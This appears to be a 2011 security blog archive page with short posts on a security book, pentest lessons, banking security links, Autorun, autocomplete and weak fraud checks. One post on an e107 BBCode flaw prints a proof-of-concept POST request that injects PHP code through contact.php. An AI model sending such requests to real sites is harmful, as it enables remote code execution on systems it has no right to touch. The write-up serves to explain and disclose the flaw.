Posts

Showing posts from January, 2011

[Book-Review] The Myths of Security: What the Computer Security Industry Doesn't Want You to Know

Image
  This book written by  John Viega  is meant mainly for non-security IT professionals and technical savvy people. The author highlighted his thoughts on - why AV fails, why we might get 0wned though we make safe caution against threat, why https fails, why IDS sucks, why CaptCha sucks, why responsible disclosure isn't responsible, why application security hasn't been achieved or won't be achieved  for always. With the price of used  book at $7.36~, it's worth to learn ideas from someone who have been in IT Security for many years and have written several security books (Building security softwares, Secure Programming Cookboook, 19 deadly sins of software,...etc). 

Common Enterprise Weakness: Only scan this and that server

Case Study: https://www.trustwave.com/downloads/Trustwave-Case-Study-Internal-Penetration-Test.pdf Analysis: TrustWave team pointed out that via insecure network segment, they eventually compromised the highly critical network segment that processes payment card information. Lesson Learnt: Based on our experience, nowadays small and medium (sometimes, even big) enterprise hire pentest services only for their critical servers whilst they fail to secure all their work station on different network segment portions. Password issues (weak password, blank password of both OS and other servers of database/commercial applications) are always common in some organizations because of the laziness of system admins there even if there is a written policy and rule for setting strong passwords. According to the case study, TrustWave team would find it harder to attack probably tightened payment card network if they targeted only that portion. We're sure that TrustWave would explain to and negoti

e107 Remote Code Execution via BBCode (aka Attacking Flaws in BBCode)

Vulnerability: http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html Analysis: Due to the sole reason of providing full capability and control over application, nowadays' web developers provide a feature that allows application admin users to run arbitrary PHP codes via applications. e107 CMS is not the only one. Drupal CMS also has this feature. [CODE] $text = preg_replace("#\[(php)#i", "[\\1", $text); [/CODE] PoC exploit is noted as: -------------------------------------------------------------------------------------------- POST /contact.php HTTP/1.1 Host: xxxx User-Agent: e107 0.7.20 Remote Code Execution Exploit Content-Type: application/x-www-form-urlencoded Content-Length: 65 send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php] -------------------------------------------------------------------------------------------- Similarly, AEF (Advanced Electron Forum)  had flawed bbC

Few Banking Security Resources

Hacking Online Banking and Credit Card Transactions – And How to Prevent It  http://www.ethicalhacker.net/content/view/31/24/ Hacking Internet Banking Applications Applications http://dl.packetstormsecurity.net/hitb05/BT-Fabrice-Marie-Hacking-Internet-Banking-Applications.pdf Hacking Internet Banking Mandiri Session Fixation http://heackerbank.blogspot.com/2011/02/hacking-internet-banking-mandiri.html THE SECURITY OF ELECTRONIC BANKING http://csrc.nist.gov/nissc/1997/proceedings/041.pdf Banking Malware: Zeus http://www.trusteer.com/files/Zeus_and_Antivirus.pdf http://en.wikipedia.org/wiki/Zeus_(trojan_horse) Banking Malware: Pinch Pro http://voices.washingtonpost.com/securityfix/2007/11/new_malware_defeats_sitekey_te.html

Autorun

Image
One of the reasons of malware spreading via readable/writable media in Windows platform is Windows itself enables Autorun by default Some applications even ask users to enable Autorun if disabled. 

Hacking Auto-Complete

Jeremiah's Research : http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010 Established Recommendation : Disable "autocomplete" or Set autocomplete="off" in input tag password field. This is 99% ignored by majority of web developers today. Myth : Before Jeremiah's Research, it was widely believed that this autocomplete issue is ONLY a local privacy issue . Attackers who physically gain access to a victim's machine can gain access to his browser autocomplete values. Lesson Learnt : Research security-related recommendations that have been acted upon issues which are considered as low-risk or impossible-to-happen. Work harder or think out of the box to create an amazingly PoC that transforms such low-risk to medium/high one.

Weak Fraud Check vulnerable to Brute Force

Image
We've seen a fraud check is being used in some web applications such as billings, and email registration such as Gmail. Here, a traditional habit is still used by developers. This is verification by digits only.